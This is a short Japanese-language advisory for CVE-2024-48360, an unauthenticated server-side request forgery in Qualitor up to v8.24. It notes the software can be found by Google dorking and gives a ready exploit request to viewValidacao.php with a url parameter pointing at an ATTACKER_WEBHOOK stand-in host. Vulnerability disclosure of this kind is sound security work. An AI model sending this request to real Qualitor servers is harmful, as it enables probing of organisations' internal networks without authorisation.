CVE-2024-48360 | Qualitor <= v8.24 認証なしSSRF
Qualitorはビジネスプロセス管理のためのプラットフォームであり、このシステムはブラジルのさまざまな企業に導入されています。Googleダーキングを使用するだけで簡単に特定できます。
私たちのチームは、SSRFの影響を受けやすいアプリケーションの脆弱性を特定しました。これにより、内部システム/ポートを列挙することが可能になります。
Qualitor v8.24には、コンポーネント /request/viewValidacao.php を介したServer-Side Request Forgery(SSRF)が含まれていることが判明しました。
この脆弱性を悪用するには、host.com/html/ad/adformmobile/request/viewValidacao.php?url=ATTACKER_WEBHOOK にリクエストを送信するだけです。脆弱なサーバーからリクエストを受け取ることができます。

https://www.linkedin.com/in/xvinicius/